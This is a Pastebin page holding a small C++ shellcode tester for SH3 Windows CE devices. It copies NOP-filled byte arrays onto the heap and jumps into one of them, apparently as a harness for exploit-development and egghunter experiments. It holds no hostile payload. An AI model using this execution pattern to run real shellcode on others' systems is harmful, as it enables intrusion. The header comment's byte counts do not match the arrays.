API tools faq
paste
Advertisement
Guest User

CPP

a guest
Mar 26th, 2019
117
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 3.34 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. SCT.cpp
  3. Elias Augusto 3/26/2019
  4. A simple SH3 shellcode tester created for the HP Jornada 680/690 running Windows CE 2.11
  5. Part of an ongoing series on exploit development, find it on my medium:
  6.  
  7. Will execute 101 bytes of shellcode and push 303 bytes onto the heap in their own little chunks
  8. Currently all it does is nop 50 times and exit, but eventually will test a custom made omlette egghunter
  9. In the meantime, feel free to use this if you're interested
  10. */
  11. #include "stdafx.h"
  12. unsigned char mainsc[]="\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  13.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  14.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  15.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  16.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  17.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  18.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  19.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  20.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  21.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";
  22.                        
  23. unsigned char scptone[]="\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  24.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  25.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  26.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  27.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  28.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  29.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  30.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  31.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  32.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";
  33.                                
  34. unsigned char scpttwo[]="\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  35.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  36.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  37.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  38.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  39.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  40.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  41.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  42.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  43.                         "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";
  44.  
  45. unsigned char scptthree[]="\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  46.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  47.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  48.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  49.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  50.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  51.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  52.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  53.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
  54.                             "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";
  55.                        
  56. int sconheap(){
  57.     //unsigned chars required to be same length, don't need to null terminate
  58.     unsigned char *scone = (unsigned char *) malloc((sizeof(scptone)/sizeof(scptone[0])));
  59.     unsigned char *sctwo = (unsigned char *) malloc((sizeof(scpttwo)/sizeof(scpttwo[0])));
  60.     unsigned char *scthree = (unsigned char *) malloc((sizeof(scptthree)/sizeof(scptthree[0])));
  61.     memcpy(scone, scptone, (sizeof(scptthree)/sizeof(scptthree[0])));
  62.     memcpy(sctwo, scpttwo, (sizeof(scptthree)/sizeof(scptthree[0])));
  63.     memcpy(scthree, scptthree, (sizeof(scptthree)/sizeof(scptthree[0])));
  64.     return (0);
  65. }
  66.  
  67. int WINAPI WinMain( HINSTANCE hInstance,
  68.                     HINSTANCE hPrevInstance,
  69.                     LPTSTR    lpCmdLine,
  70.                     int       nCmdShow)
  71. {
  72.     int tester = sconheap();
  73.     int (*func)() = (int(*)())&mainsc;
  74.     func();
  75.     return 0;
  76. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!